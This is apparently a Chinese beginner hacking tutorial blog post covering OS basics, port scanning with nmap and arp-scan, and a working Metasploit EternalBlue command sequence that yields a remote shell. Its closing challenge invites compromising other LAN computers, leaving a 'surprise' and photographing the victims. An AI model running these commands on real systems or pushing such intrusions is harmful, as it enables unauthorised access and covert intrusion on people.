让你成为白帽子黑客(系统篇)
相关说明
本章所讲述的所有黑客技术,均不得用于非法目的。
如果你觉得文章含有侵权部分,可以联系CSDN私聊,我会适当修改。
未经允许,不得转载,如需转载,请CSDN私聊。
前言
每当我们坐在电视机面前,看着电视中,黑客戴着黑色的帽子,手指在键盘上快速的敲击,电脑屏幕上快速的闪过英文字符,我们都会觉得——哇!这个人好厉害!我也好想成为这样子。
黑客通过一系列的手段,破解密码,篡改网页,攻击网络,盗取文件,这一系列操作却让人们望而却步。因为:
感觉太难了,普通人根本没办法做到!
但是,这篇文章,却可以让你做到!
可能你会想:我现在连电脑都不会用,怎么可能成为黑客?
本文提供详细的说明,你只要照着做就可以了,同时借助下列工具:
- 百度:用于搜索相关问题
- 黑客书籍:用于学习更多知识
- 工具:用于更方便的攻击,本章都会有相关教程
OK,如果你准备好了,请你继续阅读之后的内容。
安装Python
好的,现在我们开始学习成为白帽子黑客!
首先,你要有一些基础的编程能力。我们使用Python编程语言。
编程语言就像我们说的语言一样,有各式各样的语言,例如Java, C, C++等语言,我们现在学习的是简单但功能强大的语言:Python。
当然,作为黑客,我们至少要学习2门语言,这个之后再说。
下载Python安装包
和正常软件一样,我们需要下载和安装。
访问网址:https://www.python.org/
点击Download,下载最新版本:Python3.8.5.
下载到本地了之后,我们就可以安装了。和正常软件一样,根据想到安装,最后,你会在Windows10菜单中发现这个文件夹:
打开IDLE:
IDLE虽然并不是非常好看,但是其中拥有了编写Python代码的能力,现在,我们输入这个内容:
print("Hello World!")
看看发生了什么:
你让电脑输出了Hello World!
如果你遇到了问题
如果你可以成功输出,那么跳过这一小节。
如果你遇到了问题,别着急。实不相瞒,我当年为了写个Hello World,用了一个礼拜,百度都被我用的…………。
常见的问题是:你的符号有没有用英文符号?
记住,所有的内容都需要用英文符号!
搭建攻击环境
刚刚我们在电脑上安装了Python环境,并且让他输出了我们想要让他输出的内容。现在,我们需要搭建一个攻击对象!
我们需要学习的是攻击个人电脑,网站。所以我们需要自己搭建攻击环境。
搭建个人电脑,我们用到虚拟机。
首先我们下载一个镜像文件,我们打开MSDN我告诉你
然后我们看到这里,有一个操作系统,点开,然后我们可以选择我们要搭建的虚拟机的机型,然后复制ed2k链接,通过迅雷下载:
然后我们通过虚拟机软件搭建,可以通过百度学习,最后我们需要创建完成的虚拟机如下:
现在,我已经建立好了一个虚拟机了。并且已经安装好了相应的程序。
遇到了问题?
当时我安装虚拟机也是花了不少力气,如果你们遇到了问题,可以自己百度一下。
网络靶场和网站
详见之前的文章。
初级篇
相关术语
- 系统
全名操作系统,每台计算机都会装系统。系统的类型主要分为微软的Windows, 苹果公司的Mac,以及Linux。 - 开机自启项
也就是每次开机就会启动的程序,例如360开机小助手等。开机自启项属于系统关键位置。 - 资源释放
木马病毒通常通过编码,然后将一些文件和exe程序绑在一起,当用户点击木马程序后再将一些文件释放出来。 - FTP
位于21端口的FTP服务,可以远程下载东西到电脑上。 - Telnet
如果开启Telnet,则可以远程登入电脑系统。
最常见的操作系统——Windows操作系统
说到Windows,几乎所有人都知道。全球90%的电脑用户都是使用的Windows操作系统。有一些使用Linux,还有一小部分使用Mac。
Windows操作系统主要分为两个——个人操作系统,和服务器操作系统。
个人操作系统
我们可以通过使用个人操作系统来网上冲浪,娱乐,办公等。目前主流的个人操作系统主要有这几种:
- Windows 7
- Windows XP
- Windows 8
- Windows 10
XP系统是微软当时非常杰出的操作系统,后来出现了Windows7占领的市场上大部分的份额。可以说,Windows7在当时非常流行。
之后,微软开发出了Windows8,但是当时非常多的人依旧在使用Windows7,直到之后出现的Windows10。
服务器系统我们不多做介绍。
被Microsoft抛弃的系统
这里的抛弃,指的是微软已经停止一切技术支持的操作系统。目前被微软抛弃的操作系统是Windows7之前的。
Windows7操作系统其实是非常常见的,学校机房,公司等都是Windows7或者WindowsXP系统。
被抛弃的系统能用吗?
当然能用,停止技术支持并不代表停产,但是有些老旧的系统是停产的,例如Windows 4,Windows95, Windows98等操作系统。
但是你得做好心理准备,这些系统一旦被挖出漏洞,那你只能挨打——因为微软不会发布补丁程序,你只能通过杀毒软件的一些专杀工具来保护你的系统。
Windows7操作系统之前,系统其实是有点脆弱的。在Windows8之后,系统才慢慢安全起来,而且系统还内置了杀毒软件Defender。同时,还强化了Windows安全中心(如图):
这使得Windows10操作系统相对比较安全。
微软的浏览器
说到微软的浏览器,你一定马上说出:IE!
没错,当时的IE浏览器确实收获了不少用户,在浏览器中也是比比皆是的。
WindowsXP自带的IE浏览器好像是IE6,Windows 7自带的浏览器是IE8。这两款浏览器,如果你现在使用,你会发现非常老旧,很多网页都显示“你的浏览器太老了”的语句。
IE8:
现在,IE浏览器最新的版本是IE11,也是Windows 10自带的浏览器
但是,Windows 10还自带一个比较强大的浏览器:Edge。这个浏览器是微软新的浏览器。
目前,微软逐渐停更了IE,而去更新Edge。
微软总结
看了上面的文章,相信你对Widnows和微软的浏览器有了一定的了解。这些可能会提高你的安全水平
Linux
这个系统用的人远没有Windows那么多,有些人可能都没有听说过,但是黑客如果不了解一下,那你就亏大了!
Linux系统有很多优点,比如编程语言环境已经帮你搭建好了,而且有些软件只有Linux才能用,在Windows可能有问题。
其次就是Linux没有Windows那么多漏洞。
接下来介绍几个Linux的发行版本:
Kali
内置了大量的黑客工具,包括但不限于这些常用黑客工具:
- Burpsuite
- Wireshark
- SQLmap
- Nmap
- Metasploit
- BeFF
这是黑客最喜欢的操作系统,用着非常顺手,还内置了大部分编程环境,以及两款浏览器。
Ubuntu
这个版本是比较贴近于Windows的,提供了办公,音乐等娱乐项目,里面也内置了很多编程语言,所以,他比较适合开发人员。
CentOS
这个发行版我是没有用过,应该和Ubuntu差不多吧!
附一张图:
MAC
苹果公司的电脑操作系统,和Windows功能差不多,但是Windows用户很难适应MAC电脑:
- “此电脑”怎么没有啊?
- 这个Ctrl + C怎么没有用啊!
- 这个笔记本怎么右键啊?
- ……
而且,苹果公司卖的还贵,这导致了很多人不想用MAC电脑。
中级篇
上一篇,我们对计算机系统有了一些了解,接下来我们将会学习有关的黑客技术。
反病毒软件
反病毒软件就是基于黑客的思维,然后根据黑客攻击时候做出的行为,从而防止黑客入侵。
举个例子,黑客在将病毒注入电脑之后,首先就会将病毒写入注册表,对吧?然后还会写入系统服务,内存等,以保证病毒能够存活在用户电脑更久,也更安全。否则,只是一个脚本文件,很容易被发现。
随后,杀毒软件就或再系统服务,内存,注册表中查看一些未知的风险,例如不认识的引用程序。这些位置,被称为系统关键位置。
例如*60杀毒软件:
病毒查杀和系统关键位置
病毒查杀就是通过病毒库,然后对病毒进行扫描。这个不解释。
系统关键位置还包括:开机自启动项,内存,注册表,核心服务等。这些位置都是黑客和反病毒软件的博弈地点。
当然,还有端口。
常见的高风险端口有135,445,21等。这些端口都是比较危险的端口。
查看注册表和端口开放情况
我们可以运行这个程序:
来打开注册表。
这是我的Windows10虚拟机的注册表,你可以进行查看,然后发现一些高风险的地方。
查看端口的方式就是运行CMD
命令:netstat -an:
查看开放端口
Administrator账户
Administrator账户是Windows所有系统自带的管理员账户,它运行的所有文件和应用程序都是管理员权限。类似于Linux的root账户。
当然,用户的账户也拥有管理员权限的功能。
通过nmap扫描计算机端口开放情况
我们可以使用nmap这个工具来扫描计算机端口开放情况。
代码:nmap -sV +IP地址
然后你就会看到一台计算机的端口开放情况。大致如图:
nmap -sV 10.0.1.1
通过nmap,你可以扫描到一台计算机的一些参数。这些参数在未来渗透攻击的时候会有很大的用处!
如果计算机开放了445端口,那么他很有可能就有永恒之蓝漏洞。
MSF入侵Windows计算机(永恒之蓝)
我们之前说过了如何通过MSF入侵一台Windows计算机。
首先我们要使用Metasploit这个渗透测试框架,这个框架是一个开源的,非常优秀的框架。Metasploit框架内置了大量的漏洞利用模块,还有辅助模块,例如漏洞扫描等,以及编码,免杀等功能。
启动MSF的方式非常简单,你只需要在你的Kali计算机的终端内输入这个代码:
msfconsole
然后MSF框架就开始启动了:
然后我们开始利用,输入这段命令:
use exploit/windows/smb/ms17_010_eternalblue /*使用攻击模块*/
set RHOSTS 10.0.1.1 /*这个IP地址是目标靶机的IP地址*/
set LHOST 10.0.2.2 /*这个是你Kali的IP地址*/
exploit /*开始攻击*/
如果一切顺利,你会拿到对方的CMD:
C:\Windows\System32:
高级篇
由于系统的东西太多太杂了,所以之后可能还会写一个Windows篇。
我们之前学习了WIndows操作系统的很多知识,也了解了一些Windows系统中的术语。
我们黑客最终的目的就是攻击Windows系统,这对你来说已经不难了吧!相信你通过这么久的努力,已经可以攻击Windows系统了。
说实话,这篇文章的高级篇算是low的了……
那么攻击系统除了利用漏洞MSF攻击,还可以通过木马来攻击。木马病毒怎么写入注册表?怎么写入内存?怎么获得系统最高权限?这些都是问题。所以,希望大家能够静下心,好好的学一些实际的东西。
以下写给小白的东西:
高级篇的东西可能算不上难,但是希望你能够静下心来,能够把自己学习的知识广泛运用。
相信自己是能成为一个顶尖黑客的,谁都不知道哪个默默无闻的普通人,会在下一秒成为一个改变世界的人。
如果你想好了,请你继续阅读
渗透攻击第一步:扫描
在渗透攻击之前,黑客会通过扫描计算机或局域网来确定要攻击的目标和靶机的基础信息,例如什么系统,什么IP,开放了哪些端口。
那么我们首先就要扫描一个局域网。
简单说一下什么是局域网。局域网就是好几台计算机,他们通过一台交换机连接在一起,这样就形成了一个局域网。
PS:本人画画比较丑,见谅。
那么IP地址就是他们在局域网中他们自己的名字。所以在一个局域网内,每个计算机都有一个独一无二的IP地址。
我们现在是在一个局域网之下的黑客攻击。也就是说Kali电脑也是该局域网的一个成员。我们需要攻击其他计算机,并且是同一个局域网之下的。
使用这个命令可以查看电脑所在局域网下所有电脑的IP地址:
arp-scan -l
你就会拿到所有IP,包括你的IP
然后你就可以通过Nmap来获得每个计算机的详细参数了。
确定局域网环境
我们通过虚拟技术,可以虚拟的建立一个局域网。
具体方法学会自己百度或CSDN,这里我们用虚拟网络VMnet2
那么局域网的环境就是这样的:
开始你的渗透
这个就作为你的挑战任务吧!
任务:通过MSF渗透攻击局域网内其他电脑
要求:1.拿到管理员权限
2.给他们留下一个惊喜
3.拍一张照片。看看他们惊讶的样子
结束
到这里,你已经结束了你的渗透之旅。
在这个旅途上,你学习了不少本领,你又向一个顶级黑客有进一步了!
此时的你可以关闭计算机,然后穿上一个带着黑帽子的衣服。如果正值黑夜,那么正好,你可以出去走走,看看这个世界,或者站在一个山峰的顶端,看看山下忙碌的人们。
没有人知道,此时的你正在默默的看着他们。
毕竟,每个人都有自己的信仰…………
【纯属恶搞,想象一个大片的结尾,呵呵,告辞了!】